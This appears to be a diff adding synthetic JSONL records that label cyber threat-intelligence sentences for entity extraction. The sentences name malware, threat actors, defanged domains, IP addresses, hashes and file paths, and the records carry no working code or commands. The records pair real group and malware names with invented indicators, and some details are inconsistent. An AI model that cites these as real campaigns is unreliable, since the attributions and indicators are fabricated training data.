+ {"text": "Forensic examination of the compromised host identified Emotet artifacts. The primary payload was located at C:\\Windows\\Tasks\\scheduled_task.xml with SHA256 hash 6e835e50ea30aa03cbc435b6e5582213886ea53273eb4470d0f0e06d0b46b9cb. A secondary implant was found at /tmp/linpeas.sh (MD5: ab9837391347337f553ddc17b55e61d3). Network logs showed outbound connections to 159.58.207.51 and DNS queries to file-share[.]biz.", "spans": {"MALWARE: Emotet": [[56, 62]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[109, 144]], "HASH: 6e835e50ea30aa03cbc435b6e5582213886ea53273eb4470d0f0e06d0b46b9cb": [[162, 226]], "FILEPATH: /tmp/linpeas.sh": [[261, 276]], "HASH: ab9837391347337f553ddc17b55e61d3": [[283, 315]], "IP_ADDRESS: 159.58.207.51": [[362, 375]], "DOMAIN: file-share[.]biz": [[395, 411]]}, "info": {"id": "synth_00066", "source": "synthetic_ioc"}}
67
+ {"text": "Threat Intelligence Brief (FireEye): APT28 has been observed deploying Ryuk in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from delivery@package-track.cc. Infrastructure includes 216.117.107.227, 94.184.179.99, and tunnel-vpn[.]pw. SHA1 indicator: a34b97bc457d4db44b9711a1a025d703c0dd524c.", "spans": {"ORGANIZATION: FireEye": [[27, 34]], "THREAT_ACTOR: APT28": [[37, 42]], "MALWARE: Ryuk": [[71, 75]], "EMAIL: delivery@package-track.cc": [[188, 213]], "IP_ADDRESS: 216.117.107.227": [[239, 254]], "IP_ADDRESS: 94.184.179.99": [[256, 269]], "DOMAIN: tunnel-vpn[.]pw": [[275, 290]], "HASH: a34b97bc457d4db44b9711a1a025d703c0dd524c": [[308, 348]]}, "info": {"id": "synth_00067", "source": "synthetic_ioc"}}
68
+ {"text": "ALERT: Ryuk detected on Nginx endpoint. Process C:\\ProgramData\\Microsoft\\update.bat (MD5: 3f3ceacdf42e94f43ef3a7bd999f9530) initiated outbound connection to 80.168.177.2 resolving rat-control[.]info. Immediate containment recommended.", "spans": {"MALWARE: Ryuk": [[7, 11]], "SYSTEM: Nginx": [[24, 29]], "FILEPATH: C:\\ProgramData\\Microsoft\\update.bat": [[48, 83]], "HASH: 3f3ceacdf42e94f43ef3a7bd999f9530": [[90, 122]], "IP_ADDRESS: 80.168.177.2": [[157, 169]], "DOMAIN: rat-control[.]info": [[180, 198]]}, "info": {"id": "synth_00068", "source": "synthetic_ioc"}}
69
+ {"text": "The Ryuk loader contacts three staging URLs: hxxps://net-monitor[.]org/download/payload.exe, hxxp://vpn-tunnel[.]pw/gate.php, and hxxps://loader-bin[.]work/api/beacon. The final payload (SHA256: c5d6a12ee45e4a47e8004f5cd2647949cc6ed3c1e2f7e88805b5193eea5ce634) is downloaded and executed. Fallback C2 is at 210.119.13.143.", "spans": {"MALWARE: Ryuk": [[4, 8]], "URL: hxxps://net-monitor[.]org/download/payload.exe": [[45, 91]], "URL: hxxp://vpn-tunnel[.]pw/gate.php": [[93, 124]], "URL: hxxps://loader-bin[.]work/api/beacon": [[130, 166]], "HASH: c5d6a12ee45e4a47e8004f5cd2647949cc6ed3c1e2f7e88805b5193eea5ce634": [[195, 259]], "IP_ADDRESS: 210.119.13.143": [[307, 321]]}, "info": {"id": "synth_00069", "source": "synthetic_ioc"}}
70
+ {"text": "The phishing campaign used sender addresses support@account-verify.xyz and cloud@storage-share.ru. Links in the emails pointed to auth-portal[.]info hosted at 202.171.136.253. The attached document dropped a payload to C:\\Windows\\Temp\\procdump64.exe with hash a3a4c218208af26165e8fbfbf8e7b8733c71e86f217e1984e0629c26d5deafc5.", "spans": {"EMAIL: support@account-verify.xyz": [[44, 70]], "EMAIL: cloud@storage-share.ru": [[75, 97]], "DOMAIN: auth-portal[.]info": [[130, 148]], "IP_ADDRESS: 202.171.136.253": [[159, 174]], "FILEPATH: C:\\Windows\\Temp\\procdump64.exe": [[219, 249]], "HASH: a3a4c218208af26165e8fbfbf8e7b8733c71e86f217e1984e0629c26d5deafc5": [[260, 324]]}, "info": {"id": "synth_00070", "source": "synthetic_ioc"}}
71
+ {"text": "Multiple Raccoon Stealer samples identified:\n- SHA256: 7358365e2dc8ea15a4ac6ff2bae98586509a061cf4577616bfd62799064f05b6\n- SHA256: 7e4853f423e45426b3c82c646fba101a7432a3c033a6202c99d2fdada764e56a\n- MD5: dc2756314e6140a5ee196df34e851441\n- MD5: 58b4aa8a743951b94aafdb9936511320\nAll samples beacon to 162.244.194.229 and portal-auth[.]info.", "spans": {"MALWARE: Raccoon Stealer": [[9, 24]], "HASH: 7358365e2dc8ea15a4ac6ff2bae98586509a061cf4577616bfd62799064f05b6": [[55, 119]], "HASH: 7e4853f423e45426b3c82c646fba101a7432a3c033a6202c99d2fdada764e56a": [[130, 194]], "HASH: dc2756314e6140a5ee196df34e851441": [[202, 234]], "HASH: 58b4aa8a743951b94aafdb9936511320": [[242, 274]], "IP_ADDRESS: 162.244.194.229": [[297, 312]], "DOMAIN: portal-auth[.]info": [[317, 335]]}, "info": {"id": "synth_00071", "source": "synthetic_ioc"}}
72
+ {"text": "Gamaredon used LaZagne for credential dumping and PowerView for lateral movement. Credentials were exfiltrated to 208.110.213.233. The attacker pivoted to 200.230.41.191 and dropped C:\\Windows\\System32\\config\\SAM (MD5: 2d3d729756b6057852305fbbc10e7de0). C2 traffic was routed through portal-auth[.]info.", "spans": {"THREAT_ACTOR: Gamaredon": [[0, 9]], "TOOL: LaZagne": [[15, 22]], "TOOL: PowerView": [[50, 59]], "IP_ADDRESS: 208.110.213.233": [[114, 129]], "IP_ADDRESS: 200.230.41.191": [[155, 169]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[182, 212]], "HASH: 2d3d729756b6057852305fbbc10e7de0": [[219, 251]], "DOMAIN: portal-auth[.]info": [[284, 302]]}, "info": {"id": "synth_00072", "source": "synthetic_ioc"}}
73
+ {"text": "The LockBit attack began with exploitation of CVE-2024-3400. The ransomware binary (SHA256: bfff65a170a3baa34e9506d0b7cea00f5c5207ac4c64ea20ac5f42b54b3238ff) was deployed to C:\\Windows\\Tasks\\scheduled_task.xml. Ransom negotiation portal was hosted at tunnel-vpn[.]pw (151.197.200.134). Contact email for payment: it-admin@helpdesk-ticket.site.", "spans": {"MALWARE: LockBit": [[4, 11]], "CVE_ID: CVE-2024-3400": [[46, 59]], "HASH: bfff65a170a3baa34e9506d0b7cea00f5c5207ac4c64ea20ac5f42b54b3238ff": [[92, 156]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[174, 209]], "DOMAIN: tunnel-vpn[.]pw": [[251, 266]], "IP_ADDRESS: 151.197.200.134": [[268, 283]], "EMAIL: it-admin@helpdesk-ticket.site": [[313, 342]]}, "info": {"id": "synth_00073", "source": "synthetic_ioc"}}
74
+ {"text": "DNS analysis for Ryuk infrastructure: cloud-sync[.]work resolved to 141.70.86.82, ransom-pay[.]icu resolved to 217.21.36.39, and key-exchange[.]link was used as a DNS-over-HTTPS tunnel. The implant hash is 670a0458e2ae6803ddebfe79d2709d7f.", "spans": {"MALWARE: Ryuk": [[17, 21]], "DOMAIN: cloud-sync[.]work": [[38, 55]], "IP_ADDRESS: 141.70.86.82": [[68, 80]], "DOMAIN: ransom-pay[.]icu": [[82, 98]], "IP_ADDRESS: 217.21.36.39": [[111, 123]], "DOMAIN: key-exchange[.]link": [[129, 148]], "HASH: 670a0458e2ae6803ddebfe79d2709d7f": [[206, 238]]}, "info": {"id": "synth_00074", "source": "synthetic_ioc"}}
75
+ {"text": "Sandbox Report: Dridex\nSHA256: b601cd0b6b131fc59d43c0891e0873165fb98a6d40d28bab6f63311a092d8944\nMD5: 2d7b099313fec62c390f2db3af228261\nFile created: C:\\Windows\\Temp\\nc.exe\nFile modified: C:\\Windows\\System32\\wbem\\scrcons.exe\nNetwork connection: 82.181.55.17\nDNS query: backup-data[.]site\nHTTP request: hxxps://monitor-net[.]org/stage2", "spans": {"MALWARE: Dridex": [[16, 22]], "HASH: b601cd0b6b131fc59d43c0891e0873165fb98a6d40d28bab6f63311a092d8944": [[31, 95]], "HASH: 2d7b099313fec62c390f2db3af228261": [[101, 133]], "FILEPATH: C:\\Windows\\Temp\\nc.exe": [[148, 170]], "FILEPATH: C:\\Windows\\System32\\wbem\\scrcons.exe": [[186, 222]], "IP_ADDRESS: 82.181.55.17": [[243, 255]], "DOMAIN: backup-data[.]site": [[267, 285]], "URL: hxxps://monitor-net[.]org/stage2": [[300, 332]]}, "info": {"id": "synth_00075", "source": "synthetic_ioc"}}
76
+ {"text": "Analysis of AsyncRAT sample (SHA256: 79d7fc18948dae180b8250a3cc9d08cb6e4b0f47c117536c395bccc4e670a504) revealed command-and-control communication with 188.16.53.214 over port 9090. A secondary C2 channel was observed connecting to auth-token[.]space which resolved to 188.100.232.198. The malware binary was written to C:\\Windows\\System32\\svchost_update.exe and established persistence via a scheduled task.", "spans": {"MALWARE: AsyncRAT": [[12, 20]], "HASH: 79d7fc18948dae180b8250a3cc9d08cb6e4b0f47c117536c395bccc4e670a504": [[37, 101]], "IP_ADDRESS: 188.16.53.214": [[151, 164]], "DOMAIN: auth-token[.]space": [[231, 249]], "IP_ADDRESS: 188.100.232.198": [[268, 283]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[319, 357]]}, "info": {"id": "synth_00076", "source": "synthetic_ioc"}}
77
+ {"text": "Incident Report: Mustang Panda compromised the network via initial access from 205.2.242.91. The threat actor deployed LaZagne and exfiltrated data to backup-data[.]site. Lateral movement was observed to 158.193.100.219. A dropper with MD5 hash f5636f298b79b063d39ce8815cf1bfb8 was found at /tmp/.ICE-unix/agent. The exfiltration endpoint monitor-net[.]org was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: Mustang Panda": [[17, 30]], "IP_ADDRESS: 205.2.242.91": [[79, 91]], "TOOL: LaZagne": [[119, 126]], "DOMAIN: backup-data[.]site": [[151, 169]], "IP_ADDRESS: 158.193.100.219": [[204, 219]], "HASH: f5636f298b79b063d39ce8815cf1bfb8": [[245, 277]], "FILEPATH: /tmp/.ICE-unix/agent": [[291, 311]], "DOMAIN: monitor-net[.]org": [[339, 356]]}, "info": {"id": "synth_00077", "source": "synthetic_ioc"}}
78
+ {"text": "A phishing email was received from security@alert-notification.icu with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://tunnel-vpn[.]pw/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded Ryuk (SHA256: cf688b58992f4fec836d3b43440af125eca31eb17cfd81e60a166bc6a4a49576) which was saved to C:\\ProgramData\\svchost.exe.", "spans": {"EMAIL: security@alert-notification.icu": [[35, 66]], "URL: hxxps://tunnel-vpn[.]pw/login/verify": [[160, 196]], "MALWARE: Ryuk": [[292, 296]], "HASH: cf688b58992f4fec836d3b43440af125eca31eb17cfd81e60a166bc6a4a49576": [[306, 370]], "FILEPATH: C:\\ProgramData\\svchost.exe": [[391, 417]]}, "info": {"id": "synth_00078", "source": "synthetic_ioc"}}
79
+ {"text": "IOC Summary for Raccoon Stealer campaign:\n- 196.125.8.100\n- 168.172.174.205\n- 181.186.43.216\n- share-files[.]biz\n- auth-portal[.]info\n- SHA256: e8ff7f7c079749f487ed14d34fbc7642aa793944f82e62b35425814c31b417d6\n- MD5: 08a844da4566fe2bc9064c918d811158", "spans": {"MALWARE: Raccoon Stealer": [[16, 31]], "IP_ADDRESS: 196.125.8.100": [[44, 57]], "IP_ADDRESS: 168.172.174.205": [[60, 75]], "IP_ADDRESS: 181.186.43.216": [[78, 92]], "DOMAIN: share-files[.]biz": [[95, 112]], "DOMAIN: auth-portal[.]info": [[115, 133]], "HASH: e8ff7f7c079749f487ed14d34fbc7642aa793944f82e62b35425814c31b417d6": [[144, 208]], "HASH: 08a844da4566fe2bc9064c918d811158": [[216, 248]]}, "info": {"id": "synth_00079", "source": "synthetic_ioc"}}
80
+ {"text": "Exploitation of CVE-2021-21972 was attributed to APT29 targeting Windows 11 instances. The exploit payload was served from 179.152.145.170 and communicated with cdn-delivery[.]xyz for command-and-control. Post-exploitation, a webshell (SHA256: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb) was deployed to /home/www-data/.ssh/authorized_keys2.", "spans": {"CVE_ID: CVE-2021-21972": [[16, 30]], "THREAT_ACTOR: APT29": [[49, 54]], "SYSTEM: Windows 11": [[65, 75]], "IP_ADDRESS: 179.152.145.170": [[123, 138]], "DOMAIN: cdn-delivery[.]xyz": [[161, 179]], "HASH: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb": [[244, 308]], "FILEPATH: /home/www-data/.ssh/authorized_keys2": [[326, 362]]}, "info": {"id": "synth_00080", "source": "synthetic_ioc"}}
81
+ {"text": "Forensic examination of the compromised host identified LockBit artifacts. The primary payload was located at C:\\Windows\\System32\\drivers\\ndis_helper.sys with SHA256 hash d0d36681a4a8592f410d57c110572bd9e264e0041b98c5781c6847bb2786008a. A secondary implant was found at /lib/x86_64-linux-gnu/.libpam.so (MD5: 844f086613a67b6897b7f319326464b1). Network logs showed outbound connections to 202.47.13.67 and DNS queries to sync-cloud[.]work.", "spans": {"MALWARE: LockBit": [[56, 63]], "FILEPATH: C:\\Windows\\System32\\drivers\\ndis_helper.sys": [[110, 153]], "HASH: d0d36681a4a8592f410d57c110572bd9e264e0041b98c5781c6847bb2786008a": [[171, 235]], "FILEPATH: /lib/x86_64-linux-gnu/.libpam.so": [[270, 302]], "HASH: 844f086613a67b6897b7f319326464b1": [[309, 341]], "IP_ADDRESS: 202.47.13.67": [[388, 400]], "DOMAIN: sync-cloud[.]work": [[420, 437]]}, "info": {"id": "synth_00081", "source": "synthetic_ioc"}}
82
+ {"text": "Threat Intelligence Brief (SentinelOne): Turla has been observed deploying AsyncRAT in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from it-admin@helpdesk-ticket.site. Infrastructure includes 168.195.226.98, 151.193.244.213, and backup-data[.]site. SHA1 indicator: 596b138be7be8213cbb663c8a0819564bc20a953.", "spans": {"ORGANIZATION: SentinelOne": [[27, 38]], "THREAT_ACTOR: Turla": [[41, 46]], "MALWARE: AsyncRAT": [[75, 83]], "EMAIL: it-admin@helpdesk-ticket.site": [[196, 225]], "IP_ADDRESS: 168.195.226.98": [[251, 265]], "IP_ADDRESS: 151.193.244.213": [[267, 282]], "DOMAIN: backup-data[.]site": [[288, 306]], "HASH: 596b138be7be8213cbb663c8a0819564bc20a953": [[324, 364]]}, "info": {"id": "synth_00082", "source": "synthetic_ioc"}}
83
+ {"text": "ALERT: Gh0st RAT detected on Confluence Server endpoint. Process C:\\Windows\\Temp\\debug.exe (MD5: 44a95bcfbefb0a37275dacea5d2dc1ee) initiated outbound connection to 23.121.5.192 resolving monitor-net[.]org. Immediate containment recommended.", "spans": {"MALWARE: Gh0st RAT": [[7, 16]], "SYSTEM: Confluence Server": [[29, 46]], "FILEPATH: C:\\Windows\\Temp\\debug.exe": [[65, 90]], "HASH: 44a95bcfbefb0a37275dacea5d2dc1ee": [[97, 129]], "IP_ADDRESS: 23.121.5.192": [[164, 176]], "DOMAIN: monitor-net[.]org": [[187, 204]]}, "info": {"id": "synth_00083", "source": "synthetic_ioc"}}
84
+ {"text": "The Ryuk loader contacts three staging URLs: hxxps://net-monitor[.]org/download/payload.exe, hxxp://phish-kit[.]xyz/gate.php, and hxxps://cloud-sync[.]work/api/beacon. The final payload (SHA256: 82fe0cca4972d3763826f9839a91712aaf066a7426f6212f9ff51ac6902fb5b3) is downloaded and executed. Fallback C2 is at 194.194.8.244.", "spans": {"MALWARE: Ryuk": [[4, 8]], "URL: hxxps://net-monitor[.]org/download/payload.exe": [[45, 91]], "URL: hxxp://phish-kit[.]xyz/gate.php": [[93, 124]], "URL: hxxps://cloud-sync[.]work/api/beacon": [[130, 166]], "HASH: 82fe0cca4972d3763826f9839a91712aaf066a7426f6212f9ff51ac6902fb5b3": [[195, 259]], "IP_ADDRESS: 194.194.8.244": [[307, 320]]}, "info": {"id": "synth_00084", "source": "synthetic_ioc"}}
85
+ {"text": "The phishing campaign used sender addresses billing@invoice-payment.work and attacker@malicious-domain.com. Links in the emails pointed to deploy-code[.]store hosted at 82.62.33.122. The attached document dropped a payload to C:\\ProgramData\\Microsoft\\update.bat with hash d1710e340a054ce3298777fbee99bbd044f4c04122e990edbb27e234d6f20d75.", "spans": {"EMAIL: billing@invoice-payment.work": [[44, 72]], "EMAIL: attacker@malicious-domain.com": [[77, 106]], "DOMAIN: deploy-code[.]store": [[139, 158]], "IP_ADDRESS: 82.62.33.122": [[169, 181]], "FILEPATH: C:\\ProgramData\\Microsoft\\update.bat": [[226, 261]], "HASH: d1710e340a054ce3298777fbee99bbd044f4c04122e990edbb27e234d6f20d75": [[272, 336]]}, "info": {"id": "synth_00085", "source": "synthetic_ioc"}}
86
+ {"text": "Multiple RedLine Stealer samples identified:\n- SHA256: 205f238dc5be5ac306c2930ed04cab4a56d0bccc5ec87d14c88f6f08cc5cbef9\n- SHA256: 998d6b610850e314e82f2d4abfef7038f6cf8f51180df00a05c172094c9e0a81\n- MD5: 5b0ba166d78934d2c4a5467af9ebe098\n- MD5: 55853f9dc3fbbccd2cfa4fa654bba2a3\nAll samples beacon to 109.120.180.66 and botnet-cmd[.]biz.", "spans": {"MALWARE: RedLine Stealer": [[9, 24]], "HASH: 205f238dc5be5ac306c2930ed04cab4a56d0bccc5ec87d14c88f6f08cc5cbef9": [[55, 119]], "HASH: 998d6b610850e314e82f2d4abfef7038f6cf8f51180df00a05c172094c9e0a81": [[130, 194]], "HASH: 5b0ba166d78934d2c4a5467af9ebe098": [[202, 234]], "HASH: 55853f9dc3fbbccd2cfa4fa654bba2a3": [[242, 274]], "IP_ADDRESS: 109.120.180.66": [[297, 311]], "DOMAIN: botnet-cmd[.]biz": [[316, 332]]}, "info": {"id": "synth_00086", "source": "synthetic_ioc"}}
87
+ {"text": "Vice Society used PsExec for credential dumping and Metasploit for lateral movement. Credentials were exfiltrated to 51.200.210.42. The attacker pivoted to 159.28.149.7 and dropped C:\\Users\\Public\\desktop.ini (MD5: 2570f7222e2bcc72de49186867798c20). C2 traffic was routed through verify-cert[.]dev.", "spans": {"THREAT_ACTOR: Vice Society": [[0, 12]], "TOOL: PsExec": [[18, 24]], "TOOL: Metasploit": [[52, 62]], "IP_ADDRESS: 51.200.210.42": [[117, 130]], "IP_ADDRESS: 159.28.149.7": [[156, 168]], "FILEPATH: C:\\Users\\Public\\desktop.ini": [[181, 208]], "HASH: 2570f7222e2bcc72de49186867798c20": [[215, 247]], "DOMAIN: verify-cert[.]dev": [[280, 297]]}, "info": {"id": "synth_00087", "source": "synthetic_ioc"}}
88
+ {"text": "The BlackBasta attack began with exploitation of CVE-2022-30190. The ransomware binary (SHA256: de677543330be835edcc1583b47d5f8d71db0f27bfd06b307ac9a72fa575b4f9) was deployed to C:\\Recovery\\WindowsRE\\agent.exe. Ransom negotiation portal was hosted at cloud-sync[.]work (179.242.184.51). Contact email for payment: security@alert-notification.icu.", "spans": {"MALWARE: BlackBasta": [[4, 14]], "CVE_ID: CVE-2022-30190": [[49, 63]], "HASH: de677543330be835edcc1583b47d5f8d71db0f27bfd06b307ac9a72fa575b4f9": [[96, 160]], "FILEPATH: C:\\Recovery\\WindowsRE\\agent.exe": [[178, 209]], "DOMAIN: cloud-sync[.]work": [[251, 268]], "IP_ADDRESS: 179.242.184.51": [[270, 284]], "EMAIL: security@alert-notification.icu": [[314, 345]]}, "info": {"id": "synth_00088", "source": "synthetic_ioc"}}
89
+ {"text": "DNS analysis for Vidar infrastructure: loader-bin[.]work resolved to 62.204.252.145, botnet-cmd[.]biz resolved to 194.89.137.110, and code-deploy[.]store was used as a DNS-over-HTTPS tunnel. The implant hash is c0bc160f87890fec6a66ec19324b27bb.", "spans": {"MALWARE: Vidar": [[17, 22]], "DOMAIN: loader-bin[.]work": [[39, 56]], "IP_ADDRESS: 62.204.252.145": [[69, 83]], "DOMAIN: botnet-cmd[.]biz": [[85, 101]], "IP_ADDRESS: 194.89.137.110": [[114, 128]], "DOMAIN: code-deploy[.]store": [[134, 153]], "HASH: c0bc160f87890fec6a66ec19324b27bb": [[211, 243]]}, "info": {"id": "synth_00089", "source": "synthetic_ioc"}}
90
+ {"text": "Sandbox Report: BlackCat\nSHA256: 26cea5ea41514dd4d3f0078f5aa41319d387b3437c362c9abd13ac3232041be4\nMD5: a74a5f3e9e93a7d4d96d853ff54bb5a6\nFile created: C:\\Windows\\Temp\\nc.exe\nFile modified: C:\\Windows\\System32\\config\\SAM\nNetwork connection: 212.130.166.88\nDNS query: update-service[.]net\nHTTP request: hxxps://data-backup[.]site/stage2", "spans": {"MALWARE: BlackCat": [[16, 24]], "HASH: 26cea5ea41514dd4d3f0078f5aa41319d387b3437c362c9abd13ac3232041be4": [[33, 97]], "HASH: a74a5f3e9e93a7d4d96d853ff54bb5a6": [[103, 135]], "FILEPATH: C:\\Windows\\Temp\\nc.exe": [[150, 172]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[188, 218]], "IP_ADDRESS: 212.130.166.88": [[239, 253]], "DOMAIN: update-service[.]net": [[265, 285]], "URL: hxxps://data-backup[.]site/stage2": [[300, 333]]}, "info": {"id": "synth_00090", "source": "synthetic_ioc"}}
91
+ {"text": "Analysis of Agent Tesla sample (SHA256: 4b2d128750932e9d1fe69c583d6ad54f5a829a51612a902776cbc082e3cb8dd1) revealed command-and-control communication with 171.163.229.213 over port 80. A secondary C2 channel was observed connecting to vpn-tunnel[.]pw which resolved to 201.182.40.112. The malware binary was written to C:\\Users\\Public\\Libraries\\shell.ps1 and established persistence via a scheduled task.", "spans": {"MALWARE: Agent Tesla": [[12, 23]], "HASH: 4b2d128750932e9d1fe69c583d6ad54f5a829a51612a902776cbc082e3cb8dd1": [[40, 104]], "IP_ADDRESS: 171.163.229.213": [[154, 169]], "DOMAIN: vpn-tunnel[.]pw": [[234, 249]], "IP_ADDRESS: 201.182.40.112": [[268, 282]], "FILEPATH: C:\\Users\\Public\\Libraries\\shell.ps1": [[318, 353]]}, "info": {"id": "synth_00091", "source": "synthetic_ioc"}}
92
+ {"text": "Incident Report: Gamaredon compromised the network via initial access from 213.199.124.120. The threat actor deployed BloodHound and exfiltrated data to token-auth[.]space. Lateral movement was observed to 196.212.188.152. A dropper with MD5 hash 276a463eb76edb23baa19d5eaeb35a65 was found at C:\\Windows\\System32\\config\\SAM. The exfiltration endpoint micro-update[.]net was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: Gamaredon": [[17, 26]], "IP_ADDRESS: 213.199.124.120": [[75, 90]], "TOOL: BloodHound": [[118, 128]], "DOMAIN: token-auth[.]space": [[153, 171]], "IP_ADDRESS: 196.212.188.152": [[206, 221]], "HASH: 276a463eb76edb23baa19d5eaeb35a65": [[247, 279]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[293, 323]], "DOMAIN: micro-update[.]net": [[351, 369]]}, "info": {"id": "synth_00092", "source": "synthetic_ioc"}}
93
+ {"text": "A phishing email was received from it-admin@helpdesk-ticket.site with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://portal-auth[.]info/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded Ryuk (SHA256: 33af21e00813dd9554b194f7b8e5707a40c369ccedb2afd70840707b1e10e6a4) which was saved to C:\\ProgramData\\VMware\\update_service.dll.", "spans": {"EMAIL: it-admin@helpdesk-ticket.site": [[35, 64]], "URL: hxxps://portal-auth[.]info/login/verify": [[158, 197]], "MALWARE: Ryuk": [[293, 297]], "HASH: 33af21e00813dd9554b194f7b8e5707a40c369ccedb2afd70840707b1e10e6a4": [[307, 371]], "FILEPATH: C:\\ProgramData\\VMware\\update_service.dll": [[392, 432]]}, "info": {"id": "synth_00093", "source": "synthetic_ioc"}}
94
+ {"text": "IOC Summary for SystemBC campaign:\n- 176.87.8.127\n- 163.47.125.55\n- 170.205.67.88\n- token-auth[.]space\n- exchange-key[.]link\n- SHA256: c7a3248802356f2909f65c31ea904a5f52d37b28920010d6b50a8f3d6ea31e3e\n- MD5: a94e1f02269e45863ee08a25c65ce4d3", "spans": {"MALWARE: SystemBC": [[16, 24]], "IP_ADDRESS: 176.87.8.127": [[37, 49]], "IP_ADDRESS: 163.47.125.55": [[52, 65]], "IP_ADDRESS: 170.205.67.88": [[68, 81]], "DOMAIN: token-auth[.]space": [[84, 102]], "DOMAIN: exchange-key[.]link": [[105, 124]], "HASH: c7a3248802356f2909f65c31ea904a5f52d37b28920010d6b50a8f3d6ea31e3e": [[135, 199]], "HASH: a94e1f02269e45863ee08a25c65ce4d3": [[207, 239]]}, "info": {"id": "synth_00094", "source": "synthetic_ioc"}}
95
+ {"text": "Exploitation of CVE-2023-27997 was attributed to Scattered Spider targeting VMware ESXi instances. The exploit payload was served from 91.133.243.49 and communicated with mail-relay[.]icu for command-and-control. Post-exploitation, a webshell (SHA256: 9e2befedac5abe4b2de561d634496b5b51152858af53255551e0896452463601) was deployed to /var/log/.access_log.", "spans": {"CVE_ID: CVE-2023-27997": [[16, 30]], "THREAT_ACTOR: Scattered Spider": [[49, 65]], "SYSTEM: VMware ESXi": [[76, 87]], "IP_ADDRESS: 91.133.243.49": [[135, 148]], "DOMAIN: mail-relay[.]icu": [[171, 187]], "HASH: 9e2befedac5abe4b2de561d634496b5b51152858af53255551e0896452463601": [[252, 316]], "FILEPATH: /var/log/.access_log": [[334, 354]]}, "info": {"id": "synth_00095", "source": "synthetic_ioc"}}
96
+ {"text": "Forensic examination of the compromised host identified NjRAT artifacts. The primary payload was located at C:\\Windows\\System32\\config\\SAM with SHA256 hash 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea. A secondary implant was found at /dev/shm/.payload (MD5: 1bafa6cfe9b2fe395dd1ca0684cc9557). Network logs showed outbound connections to 141.177.122.166 and DNS queries to ransom-pay[.]icu.", "spans": {"MALWARE: NjRAT": [[56, 61]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[108, 138]], "HASH: 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea": [[156, 220]], "FILEPATH: /dev/shm/.payload": [[255, 272]], "HASH: 1bafa6cfe9b2fe395dd1ca0684cc9557": [[279, 311]], "IP_ADDRESS: 141.177.122.166": [[358, 373]], "DOMAIN: ransom-pay[.]icu": [[393, 409]]}, "info": {"id": "synth_00096", "source": "synthetic_ioc"}}
97
+ {"text": "Threat Intelligence Brief (Microsoft): TA505 has been observed deploying ShadowPad in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from service@subscription-renew.io. Infrastructure includes 31.76.57.104, 142.79.170.149, and api-gateway[.]club. SHA1 indicator: cd4410dfed4e22664a2b531427f9c8747a95f869.", "spans": {"ORGANIZATION: Microsoft": [[27, 36]], "THREAT_ACTOR: TA505": [[39, 44]], "MALWARE: ShadowPad": [[73, 82]], "EMAIL: service@subscription-renew.io": [[195, 224]], "IP_ADDRESS: 31.76.57.104": [[250, 262]], "IP_ADDRESS: 142.79.170.149": [[264, 278]], "DOMAIN: api-gateway[.]club": [[284, 302]], "HASH: cd4410dfed4e22664a2b531427f9c8747a95f869": [[320, 360]]}, "info": {"id": "synth_00097", "source": "synthetic_ioc"}}
98
+ {"text": "ALERT: FormBook detected on Confluence Server endpoint. Process C:\\Windows\\System32\\wbem\\scrcons.exe (MD5: 07b886ef8000f150a2eed13a1baded0c) initiated outbound connection to 211.89.109.191 resolving collect-log[.]tech. Immediate containment recommended.", "spans": {"MALWARE: FormBook": [[7, 15]], "SYSTEM: Confluence Server": [[28, 45]], "FILEPATH: C:\\Windows\\System32\\wbem\\scrcons.exe": [[64, 100]], "HASH: 07b886ef8000f150a2eed13a1baded0c": [[107, 139]], "IP_ADDRESS: 211.89.109.191": [[174, 188]], "DOMAIN: collect-log[.]tech": [[199, 217]]}, "info": {"id": "synth_00098", "source": "synthetic_ioc"}}
99
+ {"text": "The Bumblebee loader contacts three staging URLs: hxxps://loader-bin[.]work/download/payload.exe, hxxp://share-files[.]biz/gate.php, and hxxps://token-auth[.]space/api/beacon. The final payload (SHA256: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d) is downloaded and executed. Fallback C2 is at 159.65.60.31.", "spans": {"MALWARE: Bumblebee": [[4, 13]], "URL: hxxps://loader-bin[.]work/download/payload.exe": [[50, 96]], "URL: hxxp://share-files[.]biz/gate.php": [[98, 131]], "URL: hxxps://token-auth[.]space/api/beacon": [[137, 174]], "HASH: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d": [[203, 267]], "IP_ADDRESS: 159.65.60.31": [[315, 327]]}, "info": {"id": "synth_00099", "source": "synthetic_ioc"}}
100
+ {"text": "The phishing campaign used sender addresses billing@invoice-payment.work and finance@wire-transfer.info. Links in the emails pointed to system-patch[.]online hosted at 213.244.196.177. The attached document dropped a payload to C:\\Temp\\mimikatz.exe with hash 17651044fe287d9c07ab69897ae5f01a42611bb669861d99542cda2c23e9d92b.", "spans": {"EMAIL: billing@invoice-payment.work": [[44, 72]], "EMAIL: finance@wire-transfer.info": [[77, 103]], "DOMAIN: system-patch[.]online": [[136, 157]], "IP_ADDRESS: 213.244.196.177": [[168, 183]], "FILEPATH: C:\\Temp\\mimikatz.exe": [[228, 248]], "HASH: 17651044fe287d9c07ab69897ae5f01a42611bb669861d99542cda2c23e9d92b": [[259, 323]]}, "info": {"id": "synth_00100", "source": "synthetic_ioc"}}
data/processed/backup/llm_generated_synthetic_v2.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/securebert2_test.jsonl ADDED
